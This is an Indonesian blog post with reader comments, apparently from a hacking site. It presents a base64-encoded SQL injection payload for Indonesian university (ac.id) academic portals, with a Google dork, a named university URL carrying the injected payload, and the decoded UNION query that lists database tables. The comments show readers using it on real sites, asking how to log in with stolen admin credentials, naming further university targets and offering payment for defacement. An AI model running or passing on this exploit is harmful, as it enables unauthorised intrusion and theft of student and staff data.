Tadi malam iseng jalan jalan di salahsatu grup underground terkenal di Indonesia, dan ada yang share ‘bug’ SQLi base64 pada banyak situs akademik (ac.id). Query nya pun hampir sama semua. Sehingga saat kalian menemukan situs yang memiliki celah ini, cukup memasukkan ‘exploit’ nya , dan isi database akan kelihatan.
See how its work :
# Exploit Title: Indonesian University Base64 SQL Injection
# Google Dork: news/berita-kampus-MQ== ( use your brain b!tch )
# Date: [04 – 05 – 2016 23:51]
# Exploit Author: Defacer Tersakiti
# Tested on: Ubuntu Linux, Windows
Exploit :
- LTEnIFVOSU9OIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUsMHgzYzYyNzIzZSksNCw1LDYsNyw4LDkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpLS0gLQ==
Simple Exploit
Kita ambil contoh situs Siakad Universitas Kanjuruhan Malang :
- http://siakad.unikama.ac.id/index.php/news/berita-kampus-MQ==
Sekarang ganti MQ== dengan query injection diatas :
- http://siakad.unikama.ac.id/index.php/news/berita-kampus-LTEnIFVOSU9OIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUsMHgzYzYyNzIzZSksNCw1LDYsNyw4LDkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpLS0gLQ==
Boom… database kebuka.
Oke disini saya akan menjelaskan bagaimana cara kerja nya :
diatas ada kode MQ== . MQ== adalah bentuk base64 dari 1 .
Silahkan didecode di situs online atau kalau kalian menggunakan linux bisa test via terminal.
base64 -d <<< MQ==
Maka outpunya adalah angka 1.
Nah, sekarang kita ganti MQ== dengan MSc= maka isi berita nya akan blank. Kenapa MSc= ? MSc= adalah bentuk encode base64 dari 1′ .
akame@linuxsec:~$ echo -n "1'" | base64 MSc=
- -1′ UNION SELECT 1,2,group_concat(table_name,0x3c62723e),4,5,6,7,8,9 from information_schema.tables where table_schema=database()– –
Oke mungkin sekian dulu penjelasan singkat dari saya.
Untuk dasar SQL Injection Base64 bisa dilihat disini :
SQL Injection Base64 Tutorial
baiklah sekian dulu post kali ini, sihalkan dikembangkan, jika ada kebingungan silahkan komentar. Share juga ke teman temanmu biar mereka tau.
Farhan Maulana Hakim says
gan saya sukses sql injection web orang, udh nemuin admin, pass sama login adminnya tapi pas nyoba masuk kok gagal trus ya? ada kemungkinan apa gitu?
#beginner
Chino Tamvan says
itu yang kebuka kan nama table nya , nah yang saya mau tanyakan nama database nya mana ?
terima kasih
Mwmwk says
Ngeteh aso
Maulana Ridwan maliki says
Saya boleh blajar bang?, pengen bgt pinter it -_-
Kalo boleh kabarin saya ya bang 083896951062
nico el-firna says
gmna bang http://unnes.ac.id/
MrETad says
haha target lu sama kaya gue,
java nica says
Kakak, saya sudah mencoba tutorial di atas dan berhasil..masuk database kedua. Lalu selanjutnya bagaimana kakak stlh tutorial di atas berhasil?
Arif lars ulrich says
Bang ajarin ane deface website
www.uin-suka.ac.id/
Nanti ane Kasih pulsa 10k
Admin Ganteng says
mending jual gorengan bangsat
RaynaldLa'Flame says
bang ada kontak nya? saya mau tanya2 ada reward nya slow aja hheh.
MrETad says
ini decode code yg dari adminynya
-1′ UNION SELECT 1,2,group_concat(table_name,0x3c62723e),4,5,6,7,8,9 from information_schema.tables where table_schema=database()– –
decode dari base64
Ade Aprianto says
siakad.uisu.ac.id
Gimana gan?
manray says
Bang mau gabung sama tim gua ngak bang dijamin tiap tahun dapat duit banyak cuma modal ngintip database doang ngak ngacak2 dijamin aman
Ciputat says
https://siakad.um-sorong.ac.id/index.php/newsdetail/1-user-dan-password-mahasiswa
https://siakad.um-sorong.ac.id/index.php/newsdetail/’1-user-dan-password-mahasiswa
Apakah ini termasuk blind SQL??
Ciputat says
Om TS Jack wilder, boleh minta kontak yang bisa di hubungi?